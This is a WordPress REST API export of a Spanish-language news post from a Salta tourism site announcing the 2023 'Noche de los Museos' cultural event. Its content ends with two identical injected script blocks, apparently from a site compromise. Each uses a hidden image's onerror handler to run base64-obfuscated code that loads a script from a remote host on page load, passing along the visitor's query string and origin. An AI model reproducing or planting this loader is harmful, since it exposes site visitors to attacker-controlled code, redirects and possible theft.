{"id":3353,"date":"2023-11-26T22:21:36","date_gmt":"2023-11-27T01:21:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3353"},"modified":"2025-08-14T00:04:37","modified_gmt":"2025-08-14T03:04:37","slug":"salta-se-prepara-para-la-noche-de-los-museos-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3353","title":{"rendered":"Salta se prepara para LA NOCHE DE LOS MUSEOS 2023"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-cyan-bluish-gray-color has-text-color has-background\" style=\"background-color:#41330e\"><em>El *viernes 8 de diciembre, de 18:00 a 00:00 hs,* llega uno de los encuentros culturales m\u00e1s esperados: *\u201cLa Noche de los Museos\u201d.* Vas a poder disfrutarla en 43 museos, galer\u00edas de arte y proyectos art\u00edsticos de toda la provincia, con entrada gratuita.<\/em><\/h4>\n\n\n\n<p>\u00a1Este a\u00f1o habr\u00e1 una novedad! Se sumar\u00e1n galer\u00edas y proyectos de arte a la programaci\u00f3n de museos, llegando a un total de 43 espacios en 13 municipios, con la participaci\u00f3n de m\u00e1s de 400 artistas salte\u00f1os.<\/p>\n\n\n\n<p>Habr\u00e1, adem\u00e1s, una intervenci\u00f3n art\u00edstica por los *40 a\u00f1os de cultura en democracia* a cargo de artistas de BOOM!<\/p>\n\n\n\n<p>*La Noche de los Museos* es organizada por la Secretar\u00eda de Cultura de la Provincia, a trav\u00e9s de la Subsecretar\u00eda de Patrimonio Cultural, y a lo largo de los a\u00f1os se ha instalado en la agenda de salte\u00f1os, salte\u00f1as y turistas que aprovechan para disfrutar de estos espacios vivos, conectando con el arte y nuestro patrimonio.<\/p>\n\n\n\n<p>Pr\u00f3ximamente toda la programaci\u00f3n en: IG <a href=\"https:\/\/www.instagram.com\/_u\/museosconectados?fbclid=IwAR3Tvz1tew44HHM7TBoTKyjtCFgWHSnhsnPKInnfx4JhGAJy6um5bzWQj1I\" rel=\"noreferrer noopener\" target=\"_blank\">@museosconectados<\/a> \/ FB Museos Conectados \/ <a href=\"https:\/\/l.facebook.com\/l.php?u=http%3A%2F%2Fwww.culturasalta.gov.ar%2F%3Ffbclid%3DIwAR3FMeyqNant4qvbywEO3U_QRQMmnnlZKb_GwAmaWrkYtYOMaKSiI4hsYRQ&amp;h=AT0GG-gA5_xAq4ty-YAKJ114LAvEku1GwbQBfw8GiEtDSHKtz6_cnTl_Ml7r-9vT-oBN3xuWyuRcUbrgQoFTlJ81QQzVN8o46SY7so1JQPfQ4a02FG9a_ufLnueZEzQF7rXnkHOpUJ2TLkOna8aM&amp;__tn__=-UK-R&amp;c[0]=AT3dwvzbcooqwm5KX73j-zGSdRSrViQ8XxTttN4RbDjar-qiCKxB7gnIE7QD5VWqHU4BDd2CkTNUkZeUzdsQ2tmOcSIP18H50McvVt6dn0KKJBP1DpUE6LvUMSknHvBE0LSeSM72WdpLyxUT2PCXczmwJnD6scSwGpT3mlrrhreq8NnaNfz0ITIJWS_xONUC4pNpH1FutyZGS4hBPg\" rel=\"noreferrer noopener\" target=\"_blank\">www.culturasalta.gov.ar<\/a><\/p>\n\n\n\n<p>Ver gacetilla Completa en: <a href=\"https:\/\/cutt.ly\/8wIYHxBd?fbclid=IwAR1CjF9OgfCK4IH9PRwCHjv3j4NNFuQ2CRlp-FCdCqJPC0614pqvQf7xzL8\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/cutt.ly\/8wIYHxBd<\/a><\/p>\n\n\n\n<p>Fuente: secretaria de informaci\u00f3n<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El *viernes 8 de diciembre, de 18:00 a 00:00 hs,* llega uno de los encuentros culturales m\u00e1s esperados: *\u201cLa Noche de los Museos\u201d.* Vas a poder disfrutarla en 43 museos, galer\u00edas de arte y proyectos art\u00edsticos de toda la provincia, con entrada gratuita. \u00a1Este a\u00f1o habr\u00e1 una novedad! Se sumar\u00e1n galer\u00edas y proyectos de arte [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3354,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-3353","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3353"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3353"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3353\/revisions"}],"predecessor-version":[{"id":6909,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3353\/revisions\/6909"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3354"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}